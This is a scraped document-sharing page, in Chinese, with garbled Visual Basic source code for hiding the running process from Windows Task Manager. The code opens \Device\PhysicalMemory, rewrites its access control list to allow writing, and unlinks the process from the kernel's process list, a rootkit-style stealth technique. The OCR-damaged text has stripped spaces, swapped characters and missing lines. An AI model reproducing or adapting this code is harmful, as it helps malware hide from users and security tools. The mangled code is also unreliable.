vb中如何在任务管理器里面隐藏应用程序进程Word文档下载推荐.docx
《vb中如何在任务管理器里面隐藏应用程序进程Word文档下载推荐.docx》由会员分享,可在线阅读,更多相关《vb中如何在任务管理器里面隐藏应用程序进程Word文档下载推荐.docx(11页珍藏版)》请在冰豆网上搜索。
PrivateConstOBJ_PERMANENT=&
H10
PrivateConstOBJ_EXCLUSIVE=&
H20
=&
H40
&
H200
H3F2
PrivateConstOBJ_CASE_INSENSITIVE
PrivateConstOBJ_OPENIF=&
H80
PrivateConstOBJ_OPENLINK=&
H100
PrivateConstOBJ_KERNEL_HANDLE=
PrivateConstOBJ_VALID_ATTRIBUTES
PrivateTypeOBJECT_ATTRIBUTES
LengthAsLong
RootDirectoryAsLong
ObjectNameAsLong
AttributesAsLong
SecurityDeorAsLong
SecurityQualityOfServiceAsLong
PrivateTypeACL
AclRevisionAsByte
Sbz1AsByte
AclSizeAsInteger
AceCountAsInteger
Sbz2AsInteger
PrivateEnumACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
EndEnum
PrivateEnumMULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
PrivateEnumTRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
PrivateEnumTRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
PrivateTypeTRUSTEE
pMultipleTrusteeAsLong
MultipleTrusteeOperationAsMULTIPLE_TRUSTEE_OPERATION
TrusteeFormAsTRUSTEE_FORM
TrusteeTypeAsTRUSTEE_TYPE
ptstrNameAsString
PrivateTypeEXPLICIT_ACCESSgrfAccessPermissionsAsLonggrfAccessModeAsACCESS_MODEgrflnheritanceAsLong
TRUSTEEAsTRUSTEE
PrivateTypeAceArray
List()AsEXPLICIT_ACCESS
PrivateEnumSE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE=0SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARESE_KERNEL_OBJECTSE_WINDOW_OBJECT
SE_DS_OBJECTSE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECTSE_WMIGUID_OBJECT
PrivateDeclareFunctionSetSecuritylnfoLib
"
advapi32.dll"
(ByValHandleAsLong,ByVal
ObjectTypeAsSE_OBJECT_TYPE
ByValSecurityInfoAsLong
ppsidOwner
AsLong,ppsidGroupAsLong,ppDaclAsAny,ppSaclAsAny)AsLong
ObjectTypeAsSE_OBJECT_TYPE,ByValSecurityInfoAsLong,ppsidOwner
Long
pListOfExplicitEntriesAs
cCountOfExplicitEntriesAsLong
EXPLICIT_ACCESS,ByValOldAclAsLong,NewAclAsLong)AsLong
PrivateDeclareSubBuildExplicitAccessWithNameLib"
Alias
BuildExplicitAccessWithNameA"
(pExplicitAccessAsEXPLICIT_ACCESS,ByVal
ByValAccessModeAs
pTrusteeNameAsString,ByValAccessPermissionsAsLong
ACCESS_MODE,ByValInheritanceAsLong)
UNICODE_STRING,ByValSourceStringAsLong)
)AsLong
dwFileOffsetLowAsLong,ByVaidwNumberOfBytesToMapAsLong
PrivateDeclareFunctionUnmapViewOfFileLib"
kernel32"
(lpBaseAddressAsAny)AsLong
PrivateDeclareSubCopyMemoryLib"
Alias"
RtlMoveMemory"
(DestinationAsAny
SourceAsAny,ByValLengthAsLong)
PrivateDeclareFunctionGetVersionExLib"
GetVersionExA"
(IpVersionlnformationAsOSVERSIONINFO)AsLong
PrivateTypeOSVERSIONINFO
dwOSVersionInfoSizeAsLong
dwMajorVersionAsLong
dwMinorVersionAsLong
dwBuildNumberAsLong
dwPlatformIdAsLong
szCSDVersionAsString*128
PrivateverinfoAsOSVERSIONINFO
Privateg_hNtDLLAsLong
Privateg_pMapPhysicalMemoryAsLong
Privateg_hMPMAsLong
PrivateaByte(3)AsByte
PublicSubHideCurrentProcess()
在进程列表中隐藏当前应用程序进程
转载请注名来自爱软件()阿江编注。
DimthreadAsLong,processAsLong,fwAsLong,bwAsLong
DimlOffsetFlinkAsLong
lOffsetBlinkAsLong,lOffsetPIDAsLong
verinfo.dwOSVersionlnfoSize=Len(verinfo)
If(GetVersionEx(verinfo))<
>
0Then
Ifverinfo.dwPlatformld=2Then
Ifverinfo.dwMajorVersion=5Then
SelectCaseverinfo.dwMinorVersion
Case0
lOffsetFlink=&
HA0
lOffsetBlink=&
HA4
lOffsetPID=&
H9C
Case1
H88
H8C
H84
EndSelect
EndIf
IfOpenPhysicalMemory<
thread=GetData(&
HFFDFF124)process=GetData(thread+&
H44)fw=GetData(process+lOffsetFlink)bw=GetData(process+lOffsetBlink)SetDatafw+4,bw
SetDatabw,fw
CloseHandleg_hMPM
EndSub
PrivateSubSetPhyscialMemorySectionCanBeWrited(ByVaihSectionAsLong)
DimpDaciAsLong
DimpNewDaciAsLong
DimpSDAsLong
DimdwResAsLong
DimeaAsEXPLICIT_ACCESS
GetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pDaci,0,pSD
ea.grfAccessPermissions=SECTION_MAP_WRITE
ea.grfAccessMode=GRANT_ACCESS
ea.grfInheritance=NO_INHERITANCE
ea.TRUSTEE.TrusteeForm=TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType=TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName="
CURRENT_USER"
&
vbNullChar
SetEntriesInAci1,ea,pDaci,pNewDaci
SetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,
ByVaipNewDaci,0
CieanUp:
LocaiFreepSD
LocaiFreepNewDaci
PrivateFunctionOpenPhysicalMemory()AsLong
DimStatusAsLong
DimPhysmemStringAsUNICODE_STRING
DimAttributesAsOBJECT_ATTRIBUTES
RtlInitUnicodeStringPhysmemString,StrPtr("
\Device\PhysicalMemory"
Attributes.Length=Len(Attributes)
Attributes.RootDirectory=0
Attributes.ObjectName=VarPtr(PhysmemString)
Attributes.Attributes=0
Attributes.SecurityDeor=0
Attributes.SecurityQualityOfService=0
MAP_WRITE
Attributes)
Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION
Attributes)
IfStatus=STATUS_ACCESS_DENIEDThen
Status=ZwOpenSection(g_hMPM,READ_CONTROLorWRITE_DAC
SetPhyscialMemorySectionCanBeWritedg_hMPM
DimlDirectotyAsLong
If(GetVersionEx(verinfo))<
Ifverinfo.dwPlatformld
=2Then
Ifverinfo.dwMajorVersion
=5Then
lDirectoty=&
H30000
H39000
IfStatus=0Then
g_pMapPhysicalMemory
=MapViewOfFile(g_hMPM,4,0,lDirectoty,&
H1000)
Ifg_pMapPhysicalMemory
<
0ThenOpenPhysicalMemory=g_hMPM
EndFunction
PrivateFunctionLinearToPhys(BaseAddressAsLong,addrAsLong)AsLong
DimVAddrAsLong,PGDEAsLong,PTEAsLong,PAddrAsLong
DimlTempAsLong
VAddr=addr
CopyMemoryaByte(0),VAddr,4
lTemp=Fix(ByteArrToLong(aByte)/(2A22))
PGDE=BaseAddress+lTemp*4
CopyMemoryPGDE,ByVaiPGDE,4
If(PGDEAnd1)<
0Then
lTemp=PGDEAnd<
IflTemp<
PAddr=(PGDEAnd
HFFC00000
)+(VAddrAnd
H3FFFFF)
Else
PGDE=MapViewOfFile(g_hMPM,
4,0,PGDEAnd
HFFFFF000,&
lTemp=(VAddrAnd
H3FF000)
/(2人12)
PTE=PGDE+lTemp
*4
CopyMemoryPTE,ByValPTE,4
If(PTEAnd1)<
PAddr=(PTEAnd&
HFFFFFOOO)+(VAddrAnd&
HFFF)
UnmapViewOfFilePGDE
LinearToPhys=PAddr
PrivateFunctionGetData(addrAsLong)AsLong
DimphysAsLong,tmpAsLong,retAsLong
phys=LinearToPhys(g_pMapPhysicalMemory,addr)
tmp=MapViewOfFile(g_hMPM,4,0,physAnd&
HFFFFF000,&
H1000)
Iftmp<
ret=tmp+((physAnd&
HFFF)/(2A2))*4
CopyMemoryret,ByValret,4
UnmapViewOfFiletmp
GetData=ret
PrivateFunctionSetData(ByValaddrAsLong,ByValdataAsLong)AsBoolean
DimphysAsLong,tmpAsLong,xAsLong
tmp=MapViewOfFile(g_hMPM,SECTION_MAP_WRITE,0,physAnd&
HFFFFF000
x=tmp+((physAnd&
HFFF)/(2a2))*4
CopyMemoryByValx,data,4
SetData=True
PrivateFunctionByteArrToLong(inByte()AsByte)AsDouble
DimiAsInteger
Fori=0To3
ByteArrToLong=ByteArrToLong+inByte(i)*(&
H100ai)
Nexti